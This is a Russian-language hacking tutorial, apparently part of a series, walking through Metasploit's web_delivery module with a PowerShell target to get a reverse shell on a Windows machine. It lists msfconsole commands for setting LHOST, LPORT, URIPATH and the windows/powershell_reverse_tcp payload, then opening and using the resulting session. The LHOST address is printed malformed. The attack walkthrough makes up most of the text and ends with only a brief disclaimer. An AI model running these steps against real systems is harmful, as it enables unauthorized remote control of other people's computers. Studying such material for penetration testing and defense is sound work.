С возвращением, мои юные хакеры!

В предыдущей части мы рассмотрели, как использовать эксплоит веб-доставки в Metasploit для создания специального Python-скрипта для подключения к машине под управлением UNIX, Linux или OS X. У многих читателей возник закономерный вопрос: «А можно ли то же самое сделать для систем под управлением Windows?» Ответ: «ДА!»

Но есть нюанс — эксплоит веб-доставки будет работать только в тех системах Windows, на которых установлен интерпретатор Python (на самом деле на немногих системах Windows установлен Python), и практически на всех UNIX, Linux и OS X системах стоит Python по умолчанию из коробки. К счастью, все системы Windows устанавливают по умолчанию PowerShell, и мы для управления этими системами можем воспользоваться им вместе с эксплоитом веб-доставки Metasploit.

В этой статье мы будем использовать эксплоит веб-доставки Metasploit для управления системой Windows через ее PowerShell.

Шаг 1. Запустите Metasploit

Для начала запустите вашу систему Kali, затем откройте терминал и запустите Metasploit.

kali> msfconsole

Шаг 2. Загрузите эксплоит веб-доставки

Как уже упоминалось выше, использование веб-доставки в Metasploit очень похоже на веб-доставку в системах Unix, Linux и OS X, за исключением того, что в системах Windows по умолчанию не устанавливается интерпретатор Python. С другой стороны, у Windows есть PowerShell и как раз для него в Metasploit есть соответствующий модуль веб-доставки.

Давайте загрузим этот эксплоит:

msf > use exploit/multi/script/web_delivery

Установим параметры LHOST и LPORT точно так же, как мы это делали для эксплоита веб-доставки для Unix/Linux/OS X.

msf> set LHOST 192.1681.153

msf > set LPORT 44444

Затем нужно установить параметр URIPATH. Для этого параметра можно установить абсолютно любое значение, которое вам нравится. Мы установили его значение в «powersploit», но вы можете задать для него что угодно.

msf > set URIPATH powersploit

Шаг 3. Установите параметр target в PowerShell

По умолчанию эксплоит веб-доставки в Metasploit использует скрипты языка Python. Чтобы получить возможность использовать PowerShell в системах Windows, нам нужно установить значение параметра target в 2.

msf > set target 2

Когда параметр target будет установлен в 2, в нужный момент Metasploit создаст скрипт PowerShell, который мы и будем использовать.

Читать также:  Как взламывать онлайн-пароли веб-форм при помощи THC-Hydra и Burp Suite

Шаг 4. Установите полезную нагрузку (payload)

И, наконец, нам нужно установить полезную нагрузку (payload). Давайте используем payload с названием windows/powershell_reverse_tcp.

msf > set payload windows/powershell_reverse_tcp

Прежде чем мы начнем эксплуатацию уязвимостей, проверьте установленные флажки параметров, чтобы убедиться, правильно ли они выставлены.

Теперь введем команду exploit. Metasploit запустит в фоновом режиме небольшой веб-сервер и сгенерирует команду для использования в системе Windows.

Откройте командную строку на целевой системе Windows и запустите эту команду, как показано на скриншоте ниже.

Когда вы нажмете Enter, эта команда откроет соединение с атакуемой (целевой) машиной.

Теперь, в атакуемой системе, мы можем проверить, открылся ли сеанс, набрав в консоли:

sessions -l

Как видно на скриншоте выше, у нас есть открытая сессия (сеанс) с идентификатором 1. Мы можем использовать эту сессию, набрав в консоли:

sessions -i 1

где 1 — идентификатор сессии. Если ваш идентификатор сессии отличается, например, 2, 3 и т.д., то вы должны соответственно использовать этот идентификатор в приведенной выше команде.

Теперь у нас есть открытая сессия на Windows-машине. Поздравляем! Теперь можно посмотреть список запущенных на целевой системе процессов, введя в консоли команду:

PS C: \Users\OTW > Get-Process

Теперь, когда мы подключены к PowerShell в системе Windows, мы можем запускать любую команду PowerShell, а также наиболее распространенные команды Linux.

В следующей статье мы расскажем, как использовать модули PowerSploit, чтобы получить еще больше возможностей контролировать машину под управлением Windows, поэтому обязательно возвращайтесь!

Предыдущие статьи (1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12).

Отказ от ответственности: Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы воспользоваться информацией для личной выгоды, то автор и издатель не несут ответственность за любой причиненный вред или ущерб.
Показать больше в Обучение

Оставить комментарий

Проверьте также

Руководство для новичков по OWASP Juice Shop. Практика взлома 10 наиболее распространенных уязвимостей веб-приложений

Содержание:Короткая справка по OWASP Top 10Шаг 1. Установите DockerШаг 2. Установите OWASP…